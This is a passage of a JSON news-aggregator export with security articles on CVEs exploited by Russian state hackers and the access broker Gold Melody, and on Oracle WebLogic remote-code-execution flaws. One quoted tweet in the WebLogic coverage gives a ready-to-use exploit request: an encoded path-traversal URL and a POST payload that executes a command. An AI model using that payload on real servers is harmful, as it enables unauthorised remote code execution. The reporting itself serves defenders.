and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- 
Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", 
"CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T11:13:06", "description": "A financially motivated threat actor has been outed as an **initial access broker** (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware.\n\nSecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group [Gold Melody](<https://www.secureworks.com/research/threat-profiles/gold-melody>), which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant).\n\n\"This financially motivated group has been active since at least 2017, compromising organizations by exploiting vulnerabilities in unpatched internet-facing servers,\" the cybersecurity company [said](<https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker>).\n\n\"The victimology suggests opportunistic attacks for financial gain rather than a targeted campaign conducted by a state-sponsored threat group for espionage, destruction, or disruption.\"\n\nGold Melody has been [previously](<https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/>) [linked](<https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/>) to 
[attacks](<https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation>) exploiting security flaws in JBoss Messaging (CVE-2017-7504), Citrix ADC (CVE-2019-19781), Oracle WebLogic (CVE-2020-14750 and CVE-2020-14882), GitLab (CVE-2021-22205), Citrix ShareFile Storage Zones Controller (CVE-2021-22941), Atlassian Confluence (CVE-2021-26084), ForgeRock AM (CVE-2021-35464), and Apache Log4j (CVE-2021-44228) servers.\n\nThe cybercrime group has been observed expanding its victimology footprint to strike retail, health care, energy, financial transactions, and high-tech organizations in North America, Northern Europe, and Western Asia as of mid-2020.\n\nMandiant, in an analysis published in March 2023, said that \"in multiple instances, UNC961 intrusion activity has preceded the deployment of Maze and Egregor ransomware from distinct follow-on actors.\"\n\nIt further [described](<https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated>) the group as \"resourceful in their opportunistic angle to initial access operations\" and noted it \"employs a cost-effective approach to achieve initial access by exploiting recently disclosed vulnerabilities using publicly available exploit code.\"\n\nBesides relying on a diverse arsenal comprising web shells, built-in operating system software, and publicly available utilities, it's known to employ proprietary remote access trojans (RATs) and tunneling tools such as GOTROJ (aka MUTEPUT), BARNWORK, HOLEDOOR, DARKDOOR, AUDITUNNEL, HOLEPUNCH, LIGHTBUNNY, and HOLERUN to execute arbitrary commands, gather system information, and establish a reverse tunnel with a hard-coded IP address.\n\nSecureworks, which linked Gold Melody to five intrusions between July 2020 and July 2022, said these attacks entailed the abuse of a different set of flaws, including those impacting Oracle E-Business Suite ([CVE-2016-0545](<https://nvd.nist.gov/vuln/detail/CVE-2016-0545>)), Apache Struts 
([CVE-2017-5638](<https://www.synopsys.com/blogs/software-security/cve-2017-5638-apache-struts-vulnerability-explained.html>)), Sitecore XP ([CVE-2021-42237](<https://blog.assetnote.io/2021/11/02/sitecore-rce/>)), and Flexera FlexNet ([CVE-2021-4104](<https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html>)) to obtain initial access.\n\nA successful foothold is succeeded by the deployment of web shells for persistence, followed by creating directories in the compromised host to stage the tools used in the infection chain.\n\n\"Gold Melody conducts a considerable amount of scanning to understand a victim's environment,\" the company said. \"Scanning begins shortly after gaining access but is repeated and continued throughout the intrusion.\"\n\nThe reconnaissance phase paves the way for credential harvesting, lateral movement, and data exfiltration. That said, all five attacks ultimately proved to be unsuccessful.\n\n\"Gold Melody acts as a financially motivated IAB, selling access to other threat actors,\" the company concluded. \"The buyers subsequently monetize the access, likely through extortion via ransomware deployment.\"\n\n\"Its reliance on exploiting vulnerabilities in unpatched internet-facing servers for access reinforces the importance of robust patch management.\"\n
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-21T09:11:00", "type": "thn", "title": "Cyber Group 'Gold Melody' Selling Compromised Access to Ransomware Attackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0545", "CVE-2017-5638", "CVE-2017-7504", "CVE-2019-19781", "CVE-2020-14750", "CVE-2020-14882", "CVE-2021-22205", "CVE-2021-22941", "CVE-2021-26084", "CVE-2021-35464", "CVE-2021-4104", "CVE-2021-42237", "CVE-2021-44228"], "modified": "2023-09-21T09:11:14", "id": "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "href": "https://thehackernews.com/2023/09/cyber-group-gold-melody-selling.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * 
[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. 
government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-11-03T14:00:36", "description": "WordPress released a 5.5.2 update to its ubiquitous web publishing software platform. The update patches a high-severity bug, which could allow a remote unauthenticated attacker to take over a targeted website via a narrowly tailored denial-of-service attack.\n\nIn all, the [WordPress Security and Maintenance Release](<https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/>) tackled 10 security bugs and also brought a bevy of feature enhancements to the platform. WordPress said the update was a \u201cshort-cycle security and maintenance release\u201d before the next major release version 5.6. With the update, all versions since WordPress 3.7 will also be current.\n\nOf the ten security bugs patched by WordPress a standout flaw, rated high-severity, could be exploited to allow an unauthenticated attacker to execute remote code on systems hosting the vulnerable website. 
\n\n\u201cThe vulnerability allows a remote attacker to compromise the affected website,\u201d WordPress wrote in its bulletin posted Friday. \u201cThe vulnerability exists due to improper management of internal resources within the application, which can turn a denial of service attack into a remote code execution issue.\u201d\n\nThe researcher who found the bug, Omar Ganiev, founder of DeteAct, told Threatpost that the vulnerability\u2019s impact may be high, but the probability an adversary could reproduce the attack in the wild is low.\n\n\u201cThe attack vector is pretty interesting, but very hard to reproduce. And even when the right conditions exist, you have to be able to produce a very accurate DoS attack,\u201d he told Threatpost via a chat-based interview.\n\n\u201cThe principle is to trigger the DoS on the MySQL so that WordPress will think that it\u2019s not installed and then un-DoS on the DB under the same execution thread,\u201d Ganiev said. The bug was found by Ganiev three years ago, but he only reported it to WordPress in July 2019. The delay, he said, was to research different types of proof-of-concept exploits.\n\nNeither WordPress nor Ganiev believes the vulnerability has been exploited in the wild.\n\nFour bugs rated \u201cmedium risk\u201d by WordPress were also patched. All of the flaws affected WordPress versions 5.5.1 and earlier. Three of the four vulnerabilities \u2013 a cross-site scripting flaw, an improper access control bug and a cross-site request forgery vulnerability \u2013 can each be exploited by a \u201cnon-authenticated user via the internet.\u201d\n\nThe fourth medium-severity bug, a security restriction bypass vulnerability, can be triggered only by a remote authenticated user.\n\nOf the medium-severity bugs the cross-site scripting flaw is potentially the most dangerous. A successful attack lets a remote attacker steal sensitive information, change the appearance of the web page, and perform phishing and drive-by-download attacks, according to WordPress. Because WordPress insufficiently sanitizes user-supplied data sent to an affected website, the security release said, a remote attacker \u201ccan trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user\u2019s browser in context of vulnerable website.\u201d\n", "cvss3": {}, "published": "2020-10-30T20:56:19", "type": "threatpost", "title": "WordPress Patches 3-Year-Old High-Severity RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-10-30T20:56:19", "id": "THREATPOST:B574047DB8D0D69958A618406B0BDAC4", "href": "https://threatpost.com/wordpress-patches-rce-bug/160812/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-29T22:18:34", "description": "If an organization hasn\u2019t updated its Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: \u201cAssume it has been compromised.\u201d\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. According to Oracle, the attack is \u201clow\u201d in complexity, requires no privileges and no user interaction and can be exploited by attackers with network access via HTTP.\n\nThe flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\nThe October update was released Oct. 21. Fast forward to this week, Johannes B. 
Ullrich, dean of research at the SANS Technology Institute, said on Thursday that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\n\u201cAt this point, we are seeing the scans slow down a bit,\u201d said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). \u201cBut they have reached \u2018saturation\u2019 meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.\u201d\n\nUllrich said the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by \u201cJang,\u201d who described how to leverage the flaw to achieve remote code execution via only one GET request. Below is a proof of concept (POC) video.\n\nUllrich said exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.\n\nUllrich [and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. A patch availability document for WebLogic and other vulnerable Oracle products is [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. 
The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the [Sodinokibi ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n", "cvss3": {}, "published": "2020-10-29T14:49:58", "type": "threatpost", "title": "Oracle WebLogic Server RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14882"], "modified": "2020-10-29T14:49:58", "id": "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "href": "https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-03T14:35:34", "description": "Oracle has released a rare out-of-band patch for a remote code-execution flaw in several versions of its WebLogic server.\n\nThe vulnerability ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMW>)) has a CVSS base score of 9.8 out of 10, and is remotely exploitable without authentication (meaning it may be exploited over a network without the need for a username and password).\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible after they have applied the October 2020 Critical Patch Update,\u201d according to Eric Maurice, director of security assurance at Oracle, [in a Sunday advisory](<https://blogs.oracle.com/security/security-alert-cve-2020-14750-released>).\n\nWhile specific details of the flaw were not disclosed, Oracle\u2019s alert said it exists in the Console of the Oracle WebLogic Server and can be exploited via the HTTP network protocol. 
A potential attack has \u201clow\u201d complexity and no user interaction is required, said Oracle.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Affected versions of WebLogic Server include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n> Oracle released an out-of-band security alert to address a vulnerability\u2014CVE-2020-14750\u2014in Oracle WebLogic Server. Patch ASAP! <https://t.co/34wm2YYgnx> [#Cyber](<https://twitter.com/hashtag/Cyber?src=hash&ref_src=twsrc%5Etfw>) [#Cybersecurity](<https://twitter.com/hashtag/Cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#InfoSec](<https://twitter.com/hashtag/InfoSec?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 US-CERT (@USCERT_gov) [November 2, 2020](<https://twitter.com/USCERT_gov/status/1323343180218195969?ref_src=twsrc%5Etfw>)\n\nOracle said that the vulnerability \u201cis related to\u201d CVE-2020-14882, which is also a remote code-execution flaw in WebLogic Servers. CVE-2020-14882 was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\nSecurity experts on Twitter [have pointed to](<https://twitter.com/breditor/status/1323435478218022913>) the fact that the fix for CVE-2020-14882 could be bypassed by merely changing the case of a character in their request. 
This would thus sidestep the path-traversal blacklist that was implemented to block the flaw, bypassing the patch.\n\n> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2020\u201314882 Weblogic Unauthorized bypass RCE \nhttp://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal\n> \n> POST:\n> \n> _nfpb=true&_pageLabel=&handle=<https://t.co/jBUfUasQC1>.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)<https://t.co/nU8xkK30DU> [pic.twitter.com/uLiggjHnQG](<https://t.co/uLiggjHnQG>)\n> \n> \u2014 Jas502n (@jas502n) [October 28, 2020](<https://twitter.com/jas502n/status/1321416053050667009?ref_src=twsrc%5Etfw>)\n\nUpon further analysis of the bypass, \u201cThe web application is making an authorization decision based on the requested path but it is doing so without first fully decoding and canonicalizing the path,\u201d said Craig Young, security researcher with Tripwire, [in an analysis](<https://www.tripwire.com/state-of-security/vert/actively-exploited-weblogic-vulnerability/>). \u201cThe result is that a URL can be constructed to match the pattern for a permitted resource but ultimately access a completely different resource.\u201d\n\n[While the patch for CVE-2020-14882 was released](<https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/>) during an Oct. 21 update, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said last week that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\nOracle WebLogic servers continue to be hard-hit with exploits. In May, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. 
The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the [REvil/Sodinokibi ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code-execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n", "cvss3": {}, "published": "2020-11-03T13:57:26", "type": "threatpost", "title": "Oracle Rushes Emergency Fix for Critical WebLogic Server Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-11-03T13:57:26", "id": "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "href": "https://threatpost.com/oracle-update-weblogic-server-flaw/160889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-11-02T20:45:42", "description": "## What\u2019s up?\n\nAs if October 2020 hasn\u2019t been scary enough, Rapid7 Labs, the SANS Internet Storm Center (ISC), and other researchers have caught attackers opting for tricks instead of treats this week as they seek out and attempt to compromise internet-facing WebLogic servers that are vulnerable to CVE-2020-14882 ([AttackerKB Analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>)), which is an unauthenticated remote code execution (complete compromise) weakness in the Console component of Oracle WebLogic servers.\n\nBefore we sift through the candy loot bag of vulnerability and exploit details, we must pause and **urge Oracle WebLogic Server customers to patch as soon as possible.**\n\n## Vulnerability and exposure details\n\nOn Oct. 20, 2020, Oracle issued an advisory for CVE-2020-14882 in its [quarterly critical patch update](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>). 
The vulnerability is _trivial_ to exploit, with a proof-of-concept (PoC) [already available](<https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf>), courtesy of a researcher who goes by the handle [Jang](<https://twitter.com/testanull/status/1321390624042442753>). The aforelinked Medium post is worth taking the time to translate and walk through, as it provides seriously detailed information on the path Jang took to eventually craft an exploit in _a single HTTP GET request_.\n\nAffected WebLogic versions include:\n\n * 10.3.6.0.0\n * 12.1.3.0.0\n * 12.2.1.3.0\n * 12.2.1.4.0\n * 14.1.1.0.0\n\nRapid7 Labs found just over 2,000 WebLogic Console endpoints on HTTP port 7001 today (Oct. 29, 2020) with a wide version distribution:\n\nversion | n \n---|--- \n10.3.6.0 | 457 \n12.2.1.3.0 | 435 \n12.2.1.4.0 | 403 \n10.3.0.0 | 350 \n12.1.3.0.0 | 111 \n10.3.5.0 | 83 \n12.2.1.2.0 | 75 \n12.2.1.0.0 | 68 \n14.1.1.0.0 | 28 \n12.2.1.1.0 | 16 \n10.3.6.0.0 | 12 \n12.1.1.0 | 10 \n10.3.2.0 | 8 \n12.1.2.0.0 | 7 \n10.3.3.0 | 5 \n10.3.1.0 | 4 \n10.3.4.0 | 1 \n \nFrom this scan, it appears that 111 (12.1.3.0.0) are definitely vulnerable, with an additional 457 (10.3.6.0) potentially also vulnerable (while Oracle does include the version string in the HTML source it is not a _precise_ version string, so some of these could be patched already).\n\n## Attacker activity\n\nThe [SANS Internet Storm Center](<https://isc.sans.edu/diary/rss/26734>) was first to confirm that active exploitation is in progress, and Rapid7 Labs has also seen evidence of opportunistic attackers seeking out vulnerable WebLogic instances.\n\nDue to the widespread dissemination of the proof-of-concept code and evidence of active weaponization/exploitation, we expect to see continued attacks both on the public 